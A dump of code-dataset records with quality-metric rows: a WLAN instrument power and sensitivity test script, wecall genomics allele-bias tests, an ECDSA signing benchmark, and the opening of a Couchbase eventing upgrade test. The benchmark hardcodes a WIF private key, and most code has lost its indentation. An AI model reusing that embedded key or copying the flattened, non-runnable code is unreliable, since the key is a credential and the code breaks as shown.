instrument.OFDM_rate='MAND,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.MFR_control_rate='ENAB,NHT,BR12'
instrument.DFR_control_rate='ENAB,NHT,BW20,BR12,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard LOFD')
elif standard=='GNST':
instrument.tx_modulation_format = 'OFDM'
instrument.uddrate_mode = 'True'
instrument.DSSS_rate = 'DIS,DIS,DIS,DIS'
instrument.OFDM_rate = 'OPT,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.OMCS_rate ='SUPP,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS'
instrument.MFR_control_rate='ENAB,HTM,MCS'
instrument.DFR_control_rate='ENAB,HTM,BW20,MCS,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard HTOF')
instrument.signal_on()
instrument.packet_generator_ON()
instrument.wait_for_connect()
for x in range(3):
power=instrument.meas_tx_ping()
if power!='NACK':
break
print("{} | {} | {}".format(standard,channel,power))
ws.cell(row=row_count,column=1).value=str(standard)
ws.cell(row=row_count,column=2).value=str(channel)
ws.cell(row=row_count,column=3).value=str(power)
row_count+=1
wb.save('2G_power.xlsx')
wb.close()
#5g
if tech_5g_power:
wb = openpyxl.Workbook()
ws = wb.worksheets[0]
row_count = 1
for standard in ['ASTD', 'ANST']:
for channel in [36,44,48,52,60,64,100,120,140,149,157,161,165]:
instrument.signal_off()
instrument.standard = standard
instrument.channel = channel
if standard=='ASTD':
instrument.tx_modulation_format = 'OFDM'
instrument.uddrate_mode = 'True'
instrument.DSSS_rate = 'DIS,DIS,DIS,DIS'
instrument.OFDM_rate = 'MAND,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.MFR_control_rate = 'ENAB,NHT,BR12'
instrument.DFR_control_rate = 'ENAB,NHT,BW20,BR12,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard LOFD')
elif standard=='ANST':
instrument.tx_modulation_format = 'OFDM'
instrument.uddrate_mode = 'True'
instrument.DSSS_rate = 'DIS,DIS,DIS,DIS'
instrument.OFDM_rate = 'OPT,DIS,DIS,DIS,DIS,DIS,DIS,DIS'
instrument.OMCS_rate = 'SUPP,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS,NOTS'
instrument.MFR_control_rate = 'ENAB,HTM,MCS'
instrument.DFR_control_rate = 'ENAB,HTM,BW20,MCS,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard HTOF')
instrument.signal_on()
instrument.packet_generator_ON()
instrument.wait_for_connect()
for x in range(3):
power=instrument.meas_tx_ping()
if power!='NACK':
break
print("{} | {} | {}".format(standard, channel,power ))
ws.cell(row=row_count,column=1).value=str(standard)
ws.cell(row=row_count,column=2).value=str(channel)
ws.cell(row=row_count,column=3).value=str(power)
row_count+=1
wb.save('5G_power.xlsx')
wb.close()
if tech_2g_sensitivity:
wb = openpyxl.Workbook()
ws = wb.worksheets[0]
row_count = 1
for channel in [1, 6, 13]:
instrument.signal_off()
instrument.standard = 'GNST'
instrument.uddrate_mode = 'False'
instrument.channel=channel
instrument.signal_on()
instrument.wait_for_connect()
for dl_rate in ['NHT,BW20,C11M,LONG','NHT,BW20,BR12,LONG','NHT,BW20,Q6M34,LONG','HTM,BW20,MCS,LONG','HTM,BW20,MCS7,LONG']:
instrument.write('CONFigure:WLAN:SIGN1:PER:FDEF {}'.format(dl_rate))
time.sleep(0.2)
sens=instrument.meas_rx_sensitivity()
print("{} | {} | {}".format(dl_rate, channel, sens))
ws.cell(row=row_count, column=1).value = str(dl_rate)
ws.cell(row=row_count, column=2).value = str(channel)
ws.cell(row=row_count, column=3).value = str(sens)
row_count += 1
wb.save('2G_sensitivity.xlsx')
wb.close()
if tech_5g_sensitivity:
wb = openpyxl.Workbook()
ws = wb.worksheets[0]
row_count = 1
for channel in [36, 44, 48, 52, 60, 64, 100, 120, 140, 149, 157, 161, 165]:
instrument.signal_off()
instrument.standard = 'GNST'
instrument.uddrate_mode = 'False'
instrument.channel = channel
instrument.signal_on()
instrument.wait_for_connect()
for dl_rate in ['NHT,BW20,BR12,LONG', 'NHT,BW20,Q6M34,LONG', 'HTM,BW20,MCS,LONG',
'HTM,BW20,MCS7,LONG']:
instrument.write('CONFigure:WLAN:SIGN1:PER:FDEF {}'.format(dl_rate))
time.sleep(0.2)
sens = instrument.meas_rx_sensitivity()
print("{} | {} | {}".format(dl_rate, channel, sens))
ws.cell(row=row_count, column=1).value = str(dl_rate)
ws.cell(row=row_count, column=2).value = str(channel)
                ws.cell(row=row_count, column=3).value = str(sens)  # was str(power): copy-paste slip from the power loops
row_count += 1
wb.save('5G_sensitivity.xlsx')
wb.close()
```

- avg_line_length: 45.898089, max_line_length: 134, alphanum_fraction: 0.552179
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 826 | 7,206 | 4.645278 | 0.141646 | 0.059421 | 0.068022 | 0.062549 | 0.890018 | 0.864477 | 0.851446 | 0.842325 | 0.829033 | 0.829033 | 0 | 0.039004 | 0.331113 | 7,206 | 156 | 135 | 46.192308 | 0.757054 | 0.000278 | 0 | 0.753425 | 0 | 0 | 0.155074 | 0.077051 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020548 | 0 | 0.020548 | 0.054795
- unsuffixed qsc_* columns (same order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- effective: 0, hits: 7
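Every measurement loop above writes its three result columns cell by cell. An illustrative refactor of that pattern against the same openpyxl API (the helper name and sample values are mine, not the script's):

```python
import openpyxl

def write_row(ws, row, *values):
    """Write values left to right starting at column 1 (openpyxl is 1-indexed)."""
    for col, value in enumerate(values, start=1):
        ws.cell(row=row, column=col).value = str(value)

wb = openpyxl.Workbook()
ws = wb.worksheets[0]
write_row(ws, 1, "BSTD", 1, "-30.5")  # standard, channel, measured power (sample values)
wb.save("example.xlsx")
```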
**Record 7: `test/wecall_acceptance/single_sample_diploid/test_allele_bias.py`**

- hexsha: c47285f51b0eebea9f23fe5c6d51ad715495595f, size: 18,907, ext: py, lang: Python
- repo (all variants): dylex/wecall @ 35d24cefa4fba549e737cd99329ae1b17dd0156b, licenses ["MIT"]
- max_stars_count: 8 (2018-10-08T15:47:21.000Z to 2021-11-09T07:13:05.000Z)
- max_issues_count: 4 (2018-11-05T09:16:27.000Z to 2020-04-09T12:32:56.000Z)
- max_forks_count: 4 (2019-09-03T15:46:39.000Z to 2021-06-04T07:28:33.000Z)

`content`:

```python
# All content Copyright (C) 2018 Genomics plc
from wecall.genomics.variant import Variant
from wecall_test_drivers.ascii_wecall_runner import AsciiWecallRunnerTest
from wecall_test_drivers.base_test import BaseTest
from wecall_test_drivers.svc_driver import SVCDriver
class TestAlleleBiasPValue(BaseTest):
def test_should_get_unknown_value_for_homozygous_alt_call(self):
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom="1"
).with_read(
".....................T....................", chrom="1"
).with_read(
".....................T....................", chrom="1"
)
vcf_expect = driver.call().with_output_vcf()
vcf_expect.has_record_for_variant(Variant("1", 21, "A", "T")) \
.with_info().with_field("ABPV", [None])
def test_should_get_unknown_value_for_het_call_with_majority_support(self):
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom="1"
).with_read(
"..........................................", chrom="1"
).with_read(
".....................T....................", chrom="1"
).with_read(
".....................T....................", chrom="1"
)
vcf_expect = driver.call().with_output_vcf()
vcf_expect.has_record_for_variant(Variant("1", 21, "A", "T")) \
.with_info().with_field("ABPV", [None])
class TestAlleleBiasFilterWithDefaultThreshold(AsciiWecallRunnerTest):
def test_does_not_filter_homozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ..............T............. ",
" ...................T........ ",
" .................T.............. ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [8], "AD": [0, 8]}, ["PASS"])]
)
def test_does_not_filter_balanced_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" .................................... ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [8], "AD": [4, 4]}, ["PASS"])]
)
def test_does_not_filter_2_out_of_8_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [8], "AD": [6, 2]}, ["PASS"])]
)
def test_does_not_filter_2_out_of_10_heterozygous_snp(self):
chrom = '14'
sample = 'SAMPLE'
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom=chrom
).with_read(
" ................................ ", n_fwd=4, n_rev=4, chrom=chrom, sample_name=sample
).with_read(
" .................T.................. ", n_fwd=1, n_rev=1, chrom=chrom, sample_name=sample)
vcf = driver.call().with_output_vcf()
vcf \
.has_record_for_variant(Variant(chrom, 21, 'A', 'T')) \
.with_filters(set()) \
.with_sample(sample) \
.has_read_depth(10) \
.has_allelic_read_support(8, 2)
def test_does_not_filter_2_out_of_12_heterozygous_snp(self):
chrom = '14'
sample = 'SAMPLE'
driver = SVCDriver(self)
driver.with_ref_sequence(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT", chrom=chrom
).with_read(
" ................................ ", n_fwd=5, n_rev=5, chrom=chrom, sample_name=sample
).with_read(
" .................T.................. ", n_fwd=1, n_rev=1, chrom=chrom, sample_name=sample)
vcf = driver.call().with_output_vcf()
vcf \
.has_record_for_variant(Variant(chrom, 21, 'A', 'T')) \
.with_filters(set()) \
.with_sample(sample) \
.has_read_depth(12) \
.has_allelic_read_support(10, 2)
def test_does_filter_2_out_of_15_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAGTACACATACGCACGCGCCAGCACGTGAATTGATCTTGTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" .................T.................. ",
".....................T...... "],
[] # We don't call this because the variant coverage is too low
)
def test_does_not_filter_5_out_of_40_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [40], "AD": [35, 5]}, ["AB"])],
config_dict={"varFilterIDs": "AB"}
)
class TestAlleleBiasFilterWithNonDefaultThresholds(AsciiWecallRunnerTest):
def test_filters_2_out_ot_12_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [12], "AD": [10, 2]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_snp(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................T.................. ",
" .................T.................. ",
".....................T...... "],
[(21, "A", "T", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_filters_2_out_ot_12_heterozygous_insertion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**TAAAAAAAATTTTTTTTTTT",
[" .............**............. ",
" ..................**........ ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.................. ",
" ................**.................. ",
" ................**.................. ",
" ................TT.................. ",
"....................TT...... "],
[(19, "C", "CTT", {"DP": [12], "AD": [10, 2]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_insertion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**TAAAAAAAATTTTTTTTTTT",
[" .............**............. ",
" ..................**........ ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.............. ",
" ................**.................. ",
" ................**.................. ",
" ................TT.................. ",
" ................TT.................. ",
"....................TT...... "],
[(19, "C", "CTT", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_filters_2_out_ot_12_heterozygous_deletion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCGTTAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" .................................... ",
" ................**.................. ",
"....................**...... "],
[(19, "CGT", "C", {"DP": [12], "AD": [10, 2]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_deletion(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCCGTTAAAAAAAATTTTTTTTTTT",
[" ............................ ",
" ............................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" ................................ ",
" .................................... ",
" .................................... ",
" ................**.................. ",
" ................**.................. ",
"....................**...... "],
[(19, "CGT", "C", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_filters_3_out_ot_18_heterozygous_insertion_in_A4_homopolymer(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**AAAAGCCGTTTTTTTTTTT",
[" .............**............ ",
" ..................**............... ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**................. ",
" ................**................. ",
" ................**................. ",
" ................**............. ",
" ................**............. ",
" ................**................. ",
" ................**................. ",
" ................**................. ",
" ................AA................. ",
" ................AA................. ",
"....................AA..... "],
[(19, "C", "CAA", {"DP": [18], "AD": [15, 3]}, ["AB"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_insertion_in_A4_homopolymer(self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**AAAAGCCGTTTTTTTTTTT",
[" .............**............ ",
" ..................**....... ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**............. ",
" ................**................. ",
" ................**................. ",
" ................AA................. ",
" ................AA................. ",
"....................AA..... "],
[(19, "C", "CAA", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
def test_does_not_filter_3_out_ot_12_heterozygous_insertion_in_A4_homopolymer_when_some_variants_need_left_aligning(
self):
self.calls_variants_with_sample_data_and_filters(
"AAAAAAAAAAACGCACCCCC**AAAA**GCCGTTTTTTTTTTT",
[" .............**....**........ ",
" ..................**....**... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**......... ",
" ................**....**............. ",
" ................**....**............. ",
" ................**....AA............. ",
" ................AA....**............. ",
"....................AA.... "],
[(19, "C", "CAA", {"DP": [12], "AD": [9, 3]}, ["PASS"])],
config_dict={"minAlleleBiasP": "0.04"}
)
```

- avg_line_length: 50.553476, max_line_length: 120, alphanum_fraction: 0.238695
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 850 | 18,907 | 4.914118 | 0.158824 | 0.009097 | 0.043572 | 0.070385 | 0.819727 | 0.810151 | 0.804405 | 0.789562 | 0.774719 | 0.758918 | 0 | 0.01532 | 0.333686 | 18,907 | 373 | 121 | 50.689008 | 0.316241 | 0.005395 | 0 | 0.782991 | 0 | 0 | 0.509095 | 0.390171 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052786 | false | 0.02346 | 0.01173 | 0 | 0.073314 | 0
- unsuffixed qsc_* columns (same order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- effective: 0, hits: 8
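In these fixtures a `.` appears to mean a base matching the reference, a letter a substituted base, and `*` a gap. Under that reading, a tiny illustrative decoder recovers the variant the first test asserts:

```python
REF  = "AAAAAAAAAAACGCACCCCCCATAAAAAAAATTTTTTTTTTT"
READ = ".....................T...................."

# Report (position, ref base, read base) wherever the read substitutes a base.
for pos, (r, b) in enumerate(zip(REF, READ)):
    if b not in ".* " and b != r:
        print(pos, r, b)  # -> 21 A T, i.e. Variant("1", 21, "A", "T")
```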
**Record 8: `benchmarks/benchmarks/bench_ecdsa.py`**

- hexsha: 671b6f7c748a849f8f8b2bf9fabc9c8088ed2f5d, size: 7,044, ext: py, lang: Python
- repo (all variants): TheCrazyGM/bhive @ 1494e90a99123ecfc5efbd927258f9ba59443e2e, licenses ["MIT"]
- max_stars_count: 2 (2020-03-21T23:50:22.000Z to 2020-03-25T19:10:48.000Z)
- max_issues_count: null
- max_forks_count: 1 (2020-03-21T23:50:25.000Z to 2020-03-21T23:50:25.000Z)

`content` (truncated in this extract):

```python
# This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hashlib
import ecdsa
from binascii import hexlify, unhexlify
from bhivegraphenebase.account import PrivateKey, PublicKey, Address
import bhivegraphenebase.ecdsasig as ecda
from bhivegraphenebase.py23 import py23_bytes
class Benchmark(object):
goal_time = 10
class ECDSA(Benchmark):
def setup(self):
ecda.SECP256K1_MODULE = "ecdsa"
def time_sign(self):
wif = "5J4KCbg1G3my9b9hCaQXnHSm6vrwW9xQTJS6ZciW2Kek7cCkCEk"
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = ecda.sign_message(message, wif)
message = 'foo'
signature = ecda.sign_message(message, wif)
message = 'This is a short Message'
signature = ecda.sign_message(message, wif)
message = '1234567890'
signature = ecda.sign_message(message, wif)
def time_verify(self):
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = b' S\xef\x14x\x06\xeb\xba\xc5\xf9\x0e\xac\x02pL\xbeLO;\x1d"$\xd7\xfc\x07\xfb\x9c\x08\xc5b^\x1e\xec\x19\xb1y\x11\np\xec(\xc9\xf3\xfd\x1f~\xe3\x99\xe8\xc98]\xd3\x951m${\x82\x0f[(\xa9\x90#'
pubkey = ecda.verify_message(message, signature)
signature = b' W\x83\xe5w\x8f\x07\x19EV\xba\x9d\x90\x9f\xfd \x81&\x0f\xa1L\xa00zK0\x08\xf78/\x9d\x0c\x06JFx[*Z\xfe\xd1F\x8d\x9f \x19\xad\xd9\xc9\xbf\xd3\x1br\xdd\x8e\x8ei\xf8\xd2\xf40\xad\xc6\x9c\xe5'
message = 'foo'
pubkey = ecda.verify_message(message, signature)
signature = b'\x1f9\xb6_\x85\xbdr7\\\xb2N\xfb~\x82\xb7E\x80\xf1M\xa4EP=\x8elJ\x1d[t\xab%v~a\xb7\xdbS\x86;~N\xd2!\xf1k=\xb6tMm-\xf1\xd9\xfc\xf3`\xbf\xd5)\x1b\xb3N\x92u/'
message = 'This is a short Message'
pubkey = ecda.verify_message(message, signature)
message = '1234567890'
signature = b' 7\x82\xe2\xad\xdc\xdb]~\xd6\xa8J\xdc\xa5\xf4\x13<i\xb9\xc0\xdcEc\x10\xd0)t\xc7^\xecw\x05 U\x91\x0f\xa2\xce\x04\xa1\xdb\xb0\nQ\xbd\xafP`\\\x8bb\x99\xcf\xe0;\x01*\xe9D]\xad\xd9l\x1f\x05'
pubkey = ecda.verify_message(message, signature)
class Cryptography(Benchmark):
def setup(self):
try:
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric.utils \
import decode_dss_signature, encode_dss_signature
from cryptography.exceptions import InvalidSignature
ecda.SECP256K1_MODULE = "cryptography"
except ImportError:
raise NotImplementedError("cryptography not available")
def time_sign(self):
wif = "5J4KCbg1G3my9b9hCaQXnHSm6vrwW9xQTJS6ZciW2Kek7cCkCEk"
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = ecda.sign_message(message, wif)
message = 'foo'
signature = ecda.sign_message(message, wif)
message = 'This is a short Message'
signature = ecda.sign_message(message, wif)
message = '1234567890'
signature = ecda.sign_message(message, wif)
def time_verify(self):
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = b' S\xef\x14x\x06\xeb\xba\xc5\xf9\x0e\xac\x02pL\xbeLO;\x1d"$\xd7\xfc\x07\xfb\x9c\x08\xc5b^\x1e\xec\x19\xb1y\x11\np\xec(\xc9\xf3\xfd\x1f~\xe3\x99\xe8\xc98]\xd3\x951m${\x82\x0f[(\xa9\x90#'
pubkey = ecda.verify_message(message, signature)
signature = b' W\x83\xe5w\x8f\x07\x19EV\xba\x9d\x90\x9f\xfd \x81&\x0f\xa1L\xa00zK0\x08\xf78/\x9d\x0c\x06JFx[*Z\xfe\xd1F\x8d\x9f \x19\xad\xd9\xc9\xbf\xd3\x1br\xdd\x8e\x8ei\xf8\xd2\xf40\xad\xc6\x9c\xe5'
message = 'foo'
pubkey = ecda.verify_message(message, signature)
signature = b'\x1f9\xb6_\x85\xbdr7\\\xb2N\xfb~\x82\xb7E\x80\xf1M\xa4EP=\x8elJ\x1d[t\xab%v~a\xb7\xdbS\x86;~N\xd2!\xf1k=\xb6tMm-\xf1\xd9\xfc\xf3`\xbf\xd5)\x1b\xb3N\x92u/'
message = 'This is a short Message'
pubkey = ecda.verify_message(message, signature)
message = '1234567890'
signature = b' 7\x82\xe2\xad\xdc\xdb]~\xd6\xa8J\xdc\xa5\xf4\x13<i\xb9\xc0\xdcEc\x10\xd0)t\xc7^\xecw\x05 U\x91\x0f\xa2\xce\x04\xa1\xdb\xb0\nQ\xbd\xafP`\\\x8bb\x99\xcf\xe0;\x01*\xe9D]\xad\xd9l\x1f\x05'
pubkey = ecda.verify_message(message, signature)
class Secp256k1(Benchmark):
def setup(self):
try:
import secp256k1
ecda.SECP256K1_MODULE = "secp256k1"
except ImportError:
raise NotImplementedError("secp256k1 not available")
def time_sign(self):
wif = "5J4KCbg1G3my9b9hCaQXnHSm6vrwW9xQTJS6ZciW2Kek7cCkCEk"
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = ecda.sign_message(message, wif)
message = 'foo'
signature = ecda.sign_message(message, wif)
message = 'This is a short Message'
signature = ecda.sign_message(message, wif)
message = '1234567890'
signature = ecda.sign_message(message, wif)
def time_verify(self):
message = '576b2c99564392ed50e36c80654224953fdf8b5259528a1a4342c19be2da9b133c44429ac2be4d5dd588ec28e97015c34db80b7e8d8915e023c2501acd3eafe0'
signature = b' S\xef\x14x\x06\xeb\xba\xc5\xf9\x0e\xac\x02pL\xbeLO;\x1d"$\xd7\xfc\x07\xfb\x9c\x08\xc5b^\x1e\xec\x19\xb1y\x11\np\xec(\xc9\xf3\xfd\x1f~\xe3\x99\xe8\xc98]\xd3\x951m${\x82\x0f[(\xa9\x90#'
pubkey = ecda.verify_message(message, signature)
signature = b' W\x83\xe5w\x8f\x07\x19EV\xba\x9d\x90\x9f\xfd \x81&\x0f\xa1L\xa00zK0\x08\xf78/\x9d\x0c\x06JFx[*Z\xfe\xd1F\x8d\x9f \x19\xad\xd9\xc9\xbf\xd3\x1br\xdd\x8e\x8ei\xf8\xd2\xf40\xad\xc6\x9c\xe5'
message = 'foo'
pubkey = ecda.verify_message(message, signature)
signature = b'\x1f9\xb6_\x85\xbdr7\\\xb2N\xfb~\x82\xb7E\x80\xf1M\xa4EP=\x8elJ\x1d[t\xab%v~a\xb7\xdbS\x86;~N\xd2!\xf1k=\xb6tMm-\xf1\xd9\xfc\xf3`\xbf\xd5)\x1b\xb3N\x92u/'
message = 'This is a short Message'
pubkey = ecda.verify_message(message, signature)
message = '1234567890'
signature = b' 7\x82\xe2\xad\xdc\xdb]~\xd6\xa8J\xdc\xa5\xf4\x13<i\xb9\xc0\xdcEc\x10\xd0)t\xc7^\xecw\x05 U\x91\x0f\xa2\xce\x04\xa1\xdb\xb0\nQ\xbd\xafP`\\\x8bb\x99\xcf\xe0;\x01*\xe9D]\xad\xd9l\x1f\x05'
pubkey = ecda.verify_message(message, signature)
| 58.214876
| 215
| 0.704429
| 897
| 7,044
| 5.462653
| 0.230769
| 0.068571
| 0.041633
| 0.058776
| 0.830408
| 0.803469
| 0.803469
| 0.803469
| 0.803469
| 0.803469
| 0
| 0.186721
| 0.168228
| 7,044
| 120
| 216
| 58.7
| 0.649599
| 0.00724
| 0
| 0.737864
| 0
| 0.116505
| 0.475966
| 0.43176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.087379
| false
| 0
| 0.174757
| 0
| 0.31068
| 0.009709
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
677b338c7e9b106a7535bd5623ff2fe5567d10f1
| 37,590
|
py
|
Python
|
pytests/eventing/eventing_upgrade.py
|
GauthamBanasandra/testrunner
|
98260a63d535b3fd52f31bfa7b964b4b7afc943a
|
[
"Apache-2.0"
] | null | null | null |
pytests/eventing/eventing_upgrade.py
|
GauthamBanasandra/testrunner
|
98260a63d535b3fd52f31bfa7b964b4b7afc943a
|
[
"Apache-2.0"
] | null | null | null |
pytests/eventing/eventing_upgrade.py
|
GauthamBanasandra/testrunner
|
98260a63d535b3fd52f31bfa7b964b4b7afc943a
|
[
"Apache-2.0"
] | null | null | null |
import Queue
import copy
from TestInput import TestInputSingleton
from couchbase_helper.tuq_helper import N1QLHelper
from newupgradebasetest import NewUpgradeBaseTest
from membase.api.rest_client import RestHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from pytests.basetestcase import BaseTestCase
from lib.testconstants import STANDARD_BUCKET_PORT
from lib.membase.api.rest_client import RestConnection
import logging
from pytests.eventing.eventing_constants import HANDLER_CODE, EXPORTED_FUNCTION
from testconstants import COUCHBASE_VERSION_2
import os
import json
log = logging.getLogger()
class EventingUpgrade(NewUpgradeBaseTest, BaseTestCase):
def setUp(self):
super(EventingUpgrade, self).setUp()
self.rest = RestConnection(self.master)
self.server = self.master
self.queue = Queue.Queue()
self.src_bucket_name = self.input.param('src_bucket_name', 'src_bucket')
self.eventing_log_level = self.input.param('eventing_log_level', 'INFO')
self.dst_bucket_name = self.input.param('dst_bucket_name', 'dst_bucket')
self.dst_bucket_name1 = self.input.param('dst_bucket_name1', 'dst_bucket1')
self.dst_bucket_curl = self.input.param('dst_bucket_curl','dst_bucket_curl')
self.source_bucket_mutation = self.input.param('source_bucket_mutation', 'source_bucket_mutation')
self.metadata_bucket_name = self.input.param('metadata_bucket_name', 'metadata')
self.n1ql_op_dst=self.input.param('n1ql_op_dst', 'n1ql_op_dst')
self.gens_load = self.generate_docs(self.docs_per_day)
self.upgrade_version = self.input.param("upgrade_version")
def tearDown(self):
super(EventingUpgrade, self).tearDown()
